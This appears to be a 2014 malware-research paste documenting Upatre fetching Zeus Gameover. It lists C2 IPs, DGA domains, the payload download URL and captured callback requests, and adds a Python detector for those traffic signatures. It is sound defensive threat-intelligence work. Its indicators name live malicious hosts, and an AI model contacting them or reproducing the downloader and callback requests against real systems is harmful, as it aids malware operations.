Upatre downloading Zeus Gameover (GMO)

MalwareMustDie, Mar 26th, 2014
// #MalwareMustDie!
// Case: Upatre downloading Zeus Gameover (GMO)
// Detected new alive (front end) CNC in 192.210.237.212
// @unixfreaxjp /malware/checkdomains]$ date
Wed Mar 26 19:52:24 JST 2014

Upatre Sample: https://www.virustotal.com/en/file/1c3a24492f53fa16107f2ec01294bf188c32dc6c7a407a814b76685e4176a71a/analysis/1395828639/
ZGMO sample: https://www.virustotal.com/en/file/e5270d906ef13a91e176cf60473747e5bf91bc60fe457dd0f3201a5f51cf6524/analysis/1395830427/
ZGMO Polymorphic drop: https://www.virustotal.com/en/file/4f1f5242b6cf599220bcf642c7a3bd2f42739445bef5bf13b30c67ebbeeb5d64/analysis/1395830452/
ZGMO Necurs rootkit: https://www.virustotal.com/en/file/f1473d776bca32df38f449b5e4e82bdc58825aabf5b5ab03f02e0b3caaf2a661/analysis/

// Upatre downloads from 91.103.220.155

( Wed Mar 26 19:26:33 JST 2014|91.103.220.155|no-dns.dataflame.co.uk.|29550 | 91.103.216.0/21 | SIMPLYTRANSIT | GB | DATAFLAME.CO.UK | DATAFLAME INTERNET SERVICES LTD )

GET /wp-content/uploads/2014/03/2103UKp.qta HTTP/1.1
Accept: text/*, application/*
User-Agent: Updates downloader
Host: premiercrufinewine.co.uk
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Wed, 26 Mar 2014 09:57:22 GMT
Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 mod_qos/10.10
Last-Modified: Fri, 21 Mar 2014 06:12:05 GMT
ETag: "e1314-79e34-4f517c3d02e2a"
Accept-Ranges: bytes
Content-Length: 499252
Content-Type: text/plain

ZZP.A. (REDACTED)

// ZGMO DGA:

hyvguwdisgtkfjvpzrshijmjmngu.info
vsskfudeqsorzhhawghonhknp.ru
zttwocyqkpdegqgiytvcxphhy.biz
mftodqwheaiozkbzduwjzydwkonv.com
pvdlcaxlflgavwmfzvgcqhafm.com
swskvaylddwvkhursjhbyx.org
rccicerggqhswvgwolryhvsgqwsxvs.net
aulbbiwslxpvvphxnjij.biz
uoxztdipjzppjdpyttxcjrdiz.ru
zzgezdvwtwyhypfqhytcjraygqp.com
gugquwcumizhgyibbaqobajfvolbh.info


// ZGMO Callbacks ALIVE domains:
aulbbiwslxpvvphxnjij.biz,50.116.4.71,DNS1.REGISTRAR-SERVERS.COM
mftodqwheaiozkbzduwjzydwkonv.com,192.210.237.212,DNS1.REGISTRAR-SERVERS.COM

// ZGMO Callbacks:

// callback 1 to 50.116.4.71

( Wed Mar 26 19:24:28 JST 2014|50.116.4.71|li430-71.members.linode.com.|6939 | 50.116.0.0/20 | HURRICANE | US | LINODE.COM | LINODE )

POST /write HTTP/1.1
Host: default
Accept-Encoding:
Connection: close
Content-Length: 328
X-ID: 5555

.3....l.u.\...v.Y%.kH.......U.v.a.V..\..Pb.%....e..
.....'...'...Ve.F\e.E'b.2T`.AVe.G]g.4R..E#a.@Rl.A]e.
f.................?.h.\N.......}.e.Xg...............
Ud.E2..h.......!...!...io.vhj.vhU.vhU.vhU.vhU.vhU.vh
U.vhk...............jo.Gk`.vk ..9E.vkm.............lW
.|nU.vmU.qio.......'...'...nU.voT.vnU..jT..
.U.voU.voU.voU.voU...U.

// callback 2 to 192.210.237.212

( Wed Mar 26 19:25:04 JST 2014|192.210.237.212|host.colocrossing.com.|36352 | 192.210.236.0/22 | AS-COLOCROSSING | US | NWNX.NET | NEW WAVE NETCONNECT LLC )

POST /write HTTP/1.1
Host: default
Accept-Encoding:
Connection: close
Content-Length: 328
X-ID: 5555

.uj......Z..Lp=..N.H..............r}.E..!J..F#re.......
'...'...V...\...'...T...V...]...R...#...R...]..f.......
.........:U.h.6.._...Z......g...............U...2..h...
....!...!...i...h...h...h...h...h...h...h...hk.........
......jih.k1..kf.Z9...km.............l...n...m...io....
...'...'...n...o...n..hj..t....o...o...o...o..t...


#MalwareMustDie!!
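Added detection example, not part of the original paste and not MalwareMustDie's own tooling: a small Python checker that parses raw HTTP requests and flags the two request shapes captured above (the Upatre fetch with User-Agent "Updates downloader", and the ZGMO "POST /write" callback with "Host: default" and an X-ID header), then falls back to the listed C2 IPs and domains and to a length-based heuristic. The sample requests inside it are constructed; the heuristic's bounds (20 to 30 lowercase letters under one of the six TLDs) are an assumption drawn only from the eleven DGA names in the paste, not the published DGA algorithm.

```python
import re
from typing import List, Optional, Tuple

# Indicators copied from the paste (observed 2014-03-26).
KNOWN_C2_IPS = {"91.103.220.155", "50.116.4.71", "192.210.237.212"}
KNOWN_C2_DOMAINS = {
    "premiercrufinewine.co.uk",          # Upatre download host
    "aulbbiwslxpvvphxnjij.biz",          # ZGMO alive callback domain
    "mftodqwheaiozkbzduwjzydwkonv.com",  # ZGMO alive callback domain
}
# Assumption: bounds derived from the eleven DGA names in the paste, nothing more.
_DGA_RE = re.compile(r"^[a-z]{20,30}\.(?:biz|com|info|net|org|ru)$")


def parse_request(raw: str) -> dict:
    """Split a raw HTTP request into method, path and a lower-cased header map.

    The body (the 328-byte encrypted blob in the callbacks) is ignored; only
    the request line and headers are needed for the signatures below.
    """
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    parts = lines[0].split()
    method = parts[0].upper() if parts else ""
    path = parts[1] if len(parts) > 1 else ""
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:  # tolerate empty values such as "Accept-Encoding:"
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers}


def looks_like_zgmo_dga(host: str) -> bool:
    """Heuristic only: 20-30 lowercase letters under one of the six TLDs seen."""
    return bool(_DGA_RE.match(host.strip().lower()))


def classify_request(raw: str, dst_ip: Optional[str] = None) -> Optional[str]:
    """Return a verdict label, or None when nothing from the paste matches."""
    req = parse_request(raw)
    h = req["headers"]
    host = h.get("host", "").lower()
    # ZGMO callback: POST /write to a literal "default" Host with an X-ID header.
    if req["method"] == "POST" and req["path"] == "/write" \
            and host == "default" and "x-id" in h:
        return "zgmo-callback"
    # Upatre downloader: fixed User-Agent on the payload fetch.
    if req["method"] == "GET" and h.get("user-agent") == "Updates downloader":
        return "upatre-download"
    # Plain indicator match on the paste's IPs and domains.
    if host in KNOWN_C2_DOMAINS or dst_ip in KNOWN_C2_IPS:
        return "known-ioc"
    if looks_like_zgmo_dga(host):
        return "dga-like-host"
    return None


# Constructed sample traffic: two requests modelled on the captures above,
# one DGA-style host, and one benign request. The IPs of the last two are
# documentation ranges (TEST-NET), not real infrastructure.
SAMPLE_REQUESTS: List[Tuple[str, str]] = [
    ("91.103.220.155",
     "GET /wp-content/uploads/2014/03/2103UKp.qta HTTP/1.1\r\n"
     "Accept: text/*, application/*\r\nUser-Agent: Updates downloader\r\n"
     "Host: premiercrufinewine.co.uk\r\nCache-Control: no-cache\r\n\r\n"),
    ("50.116.4.71",
     "POST /write HTTP/1.1\r\nHost: default\r\nAccept-Encoding:\r\n"
     "Connection: close\r\nContent-Length: 328\r\nX-ID: 5555\r\n\r\n"
     "<328 bytes of encrypted body omitted>"),
    ("203.0.113.7",
     "GET / HTTP/1.1\r\nHost: vsskfudeqsorzhhawghonhknp.ru\r\n\r\n"),
    ("198.51.100.10",
     "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
     "User-Agent: Mozilla/5.0\r\n\r\n"),
]


def scan(samples: List[Tuple[str, str]]) -> List[Tuple[str, Optional[str]]]:
    """Classify each (dst_ip, raw_request) pair."""
    return [(ip, classify_request(raw, ip)) for ip, raw in samples]


if __name__ == "__main__":
    for ip, verdict in scan(SAMPLE_REQUESTS):
        print(f"{ip:>16}  {verdict or 'clean'}")
```

The behavioural signatures are checked before the indicator lists on purpose: the callback shape (POST /write, Host: default, X-ID) is identical across both C2 hosts in the paste, so it keeps matching when the bot rotates to a DGA domain the lists do not yet contain.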